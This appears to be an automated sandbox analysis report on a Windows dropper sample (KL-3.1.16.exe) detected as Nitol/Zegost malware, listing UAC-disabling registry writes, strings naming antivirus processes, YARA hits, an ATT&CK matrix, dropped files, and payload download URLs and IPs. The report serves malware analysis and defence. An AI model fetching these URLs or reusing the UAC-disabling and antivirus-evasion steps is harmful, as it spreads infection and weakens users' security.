Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\KL-3.1.16.exe

Code function: 0_2_00007FF6F9254D20 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00007FF6F9254D20

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Code function: 2_2_00000001800347B0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

2_2_00000001800347B0

Source: C:\Users\user\Desktop\KL-3.1.16.exe

Code function: 0_2_00007FF6F9254260 HeapCreate,GetVersion,HeapSetInformation,

0_2_00007FF6F9254260

Lowering of HIPS / PFW / Operating System Security Settings

Contains functionality to modify Windows User Account Control (UAC) settings

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemConsentPromptBehaviorAdminEnableLUAPromptOnSecureDesktop

33_2_06CF1B6D

Disable UAC(promptonsecuredesktop)

Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe

Registry value created: PromptOnSecureDesktop 0

Disables UAC (registry)

Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Source: irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: irsetup.exe, 00000002.00000002.4644080791.0000000002650000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msmpeng.exe
Source: irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: 360Tray.exe
Source: irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: AYAgent.aye
Source: irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe
Source: irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: Mcshield.exe
Source: irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Yara detected Nitol

Source: Yara match	File source: 33.2.iusb3mon.exe.6cf0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.4ec05bf.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.4ec05bf.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.6cf0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.4be65ff.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.631b567.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.631b567.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4652369684.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4652621653.0000000006315000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: irsetup.exe PID: 6980, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iusb3mon.exe PID: 4196, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

Yara detected Zegost

Source: Yara match	File source: 33.2.iusb3mon.exe.6cf0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.4ec05bf.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.4ec05bf.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.6cf0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.4be65ff.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.631b567.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.631b567.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4652369684.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4652621653.0000000006315000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

Remote Access Functionality

Yara detected Nitol

Source: Yara match	File source: 33.2.iusb3mon.exe.6cf0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.4ec05bf.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.4ec05bf.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.6cf0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.4be65ff.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.631b567.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.631b567.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4652369684.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4652621653.0000000006315000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: irsetup.exe PID: 6980, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iusb3mon.exe PID: 4196, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

Yara detected Zegost

Source: Yara match	File source: 33.2.iusb3mon.exe.6cf0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.4ec05bf.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.4ec05bf.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.6cf0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.4be65ff.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.631b567.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.iusb3mon.exe.631b567.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4652369684.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4652621653.0000000006315000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	2 Disable or Modify Tools	121 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	1 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	121 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	4 Windows Service	1 Bypass User Account Control	3 Obfuscated Files or Information	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	1 Valid Accounts	12 Software Packing	NTDS	251 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 Service Execution	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Virtualization/Sandbox Evasion	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	2 PowerShell	RC Scripts	4 Windows Service	1 Bypass User Account Control	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	21 Process Injection	13 Masquerading	DCSync	11 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	11 Scheduled Task/Job	1 Valid Accounts	Proc Filesystem	2 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	241 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Rundll32	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Indicator Removal	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
KL-3.1.16.exe	12%	Virustotal		Browse
KL-3.1.16.exe	11%	ReversingLabs	Win64.Dropper.Generic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	100%	Avira	TR/Crypt.XPACK.Gen2
C:\ProgramData\Program\iusb3mon.exe	100%	Avira	TR/Crypt.XPACK.Gen2
C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	100%	Joe Sandbox ML
C:\ProgramData\Program\iusb3mon.exe	100%	Joe Sandbox ML
C:\Program Files\product1\letsvpn-latest.exe	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll	0%	ReversingLabs

Name	IP	Active	Malicious
ooddoo.top	104.21.81.224	true	true
fp3011.wpc.phicdn.net	152.199.19.74	true	false
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ooddoo.top/abc/15.exe	true
https://ooddoo.top/abc/16.exe	true
http://ooddoo.top/abc/16.exe	true
https://ooddoo.top/abc/15.exe	true

URLs from Memory and Binaries

Name	Source	Malicious
https://ooddoo.top/abc/15.exeLocal	irsetup.exe, 00000002.00000002.4637507954.0000000000946000.00000004.00000020.00020000.00000000.sdmp	false
http://nuget.org/NuGet.exe	powershell.exe, 0000000C.00000002.2255780441.0000019D4FD9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2255780441.0000019D4FED2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2240052551.0000019D416E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2521125684.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2495816920.00000000060A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2513401129.00000000064A8000.00000004.00000800.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 0000000C.00000002.2240052551.0000019D411D9000.00000004.00000800.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000019.00000002.2432143773.0000000005596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2416175038.00000000032E8000.00000004.00000020.00020000.00000000.sdmp	false
http://%s/ip.txtMozilla/4.0	irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	false
http://crl.microsoft	powershell.exe, 0000000C.00000002.2238695138.0000019D3E3B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2530159061.0000000007894000.00000004.00000020.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000019.00000002.2432143773.0000000005596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2416175038.00000000032E8000.00000004.00000020.00020000.00000000.sdmp	false
http://ooddoo.top/abc/16.exel	irsetup.exe, 00000002.00000002.4645133676.00000000038E7000.00000004.00000020.00020000.00000000.sdmp	false
http://www.microsoft.co	powershell.exe, 0000000C.00000002.2258796359.0000019D58146000.00000004.00000020.00020000.00000000.sdmp	false
http://www.yourcompany.com	irsetup.exe, 00000002.00000003.2115477987.0000000004BED000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4645133676.0000000003880000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/License	powershell.exe, 00000019.00000002.2513401129.00000000064A8000.00000004.00000800.00020000.00000000.sdmp	false
https://contoso.com/Icon	powershell.exe, 00000019.00000002.2513401129.00000000064A8000.00000004.00000800.00020000.00000000.sdmp	false
http://www.microsoft.	powershell.exe, 00000016.00000002.2526027201.0000000007822000.00000004.00000020.00020000.00000000.sdmp	false
http://nsis.sf.net/NSIS_ErrorError	irsetup.exe, 00000002.00000003.2131342981.0000000004BE7000.00000004.00000020.00020000.00000000.sdmp	false
http://ooddoo.top/abc/	irsetup.exe, 00000002.00000002.4644080791.0000000002650000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4645133676.00000000038E7000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4645133676.0000000003880000.00000004.00000020.00020000.00000000.sdmp	false
http://www.indigorose.com/route.php?pid=suf9buy	KL-3.1.16.exe, 00000000.00000003.2109190884.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000000.2113408849.00007FF7C060A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000002.4652583327.00007FF7C060A000.00000002.00000001.01000000.00000005.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 00000019.00000002.2432143773.0000000005596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2416175038.00000000032E8000.00000004.00000020.00020000.00000000.sdmp	false
http://www.indigorose.com	KL-3.1.16.exe, 00000000.00000002.2237266119.00000000028D0000.00000004.00000020.00020000.00000000.sdmp	false
http://ooddoo.top/abc/16.exeX	irsetup.exe, 00000002.00000002.4645133676.00000000038E7000.00000004.00000020.00020000.00000000.sdmp	false
http://104.168.152.151/abc/	irsetup.exe, 00000002.00000003.2115477987.0000000004BED000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4644080791.0000000002650000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4645133676.00000000038E7000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4645133676.0000000003880000.00000004.00000020.00020000.00000000.sdmp	false
https://aka.ms/pscore6lB	powershell.exe, 00000013.00000002.2442918374.000000000527E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2432510205.0000000004B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2434963175.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2432143773.0000000005441000.00000004.00000800.00020000.00000000.sdmp	false
https://ooddoo.top/abc/16.exekX	irsetup.exe, 00000002.00000002.4646137288.0000000004DFD000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2383968529.0000000004E20000.00000004.00000020.00020000.00000000.sdmp	false
http://ooddoo.top/abc/16.exeL	irsetup.exe, 00000002.00000002.4644080791.0000000002650000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/	powershell.exe, 00000019.00000002.2513401129.00000000064A8000.00000004.00000800.00020000.00000000.sdmp	false
https://nuget.org/nuget.exe	powershell.exe, 0000000C.00000002.2255780441.0000019D4FD9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2255780441.0000019D4FED2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2240052551.0000019D416E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2521125684.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2495816920.00000000060A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2513401129.00000000064A8000.00000004.00000800.00020000.00000000.sdmp	false
http://%s/ip.txt	irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	false
https://oneget.orgX	powershell.exe, 0000000C.00000002.2240052551.0000019D411D9000.00000004.00000800.00020000.00000000.sdmp	false
https://xiaoma.s3.ap-east-1.amazonaws.com/iusb3mon.exe	irsetup.exe, 00000002.00000003.2115477987.0000000004BED000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4644080791.0000000002650000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4645133676.00000000038E7000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4645133676.0000000003880000.00000004.00000020.00020000.00000000.sdmp	false
https://aka.ms/pscore68	powershell.exe, 0000000C.00000002.2240052551.0000019D3FD21000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000C.00000002.2240052551.0000019D3FD21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2442918374.000000000527E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2432510205.0000000004B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2434963175.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2432143773.0000000005441000.00000004.00000800.00020000.00000000.sdmp	false
http://ooddoo.top/abc/16.exebX	irsetup.exe, 00000002.00000002.4646137288.0000000004DFD000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2383968529.0000000004E20000.00000004.00000020.00020000.00000000.sdmp	false
https://oneget.org	powershell.exe, 0000000C.00000002.2240052551.0000019D411D9000.00000004.00000800.00020000.00000000.sdmp	false
http://ooddoo.top/abc/15.exe0	irsetup.exe, 00000002.00000002.4644080791.0000000002650000.00000004.00000020.00020000.00000000.sdmp	false
http://www.indigorose.com/route.php?pid=suf9buyd	KL-3.1.16.exe, 00000000.00000003.2109190884.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000000.2113408849.00007FF7C060A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000002.4652583327.00007FF7C060A000.00000002.00000001.01000000.00000005.sdmp	false
https://ooddoo.top/	irsetup.exe, 00000002.00000002.4646137288.0000000004DE0000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.81.224	ooddoo.top	United States		13335	CLOUDFLARENETUS	true
143.92.60.116	unknown	Singapore		64050	BCPL-SGBGPNETGlobalASNSG	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582021
Start date and time:	2024-12-29 16:06:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	162
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	KL-3.1.16.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@240/102@1/3
EGA Information:	Successful, ratio: 42.9%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

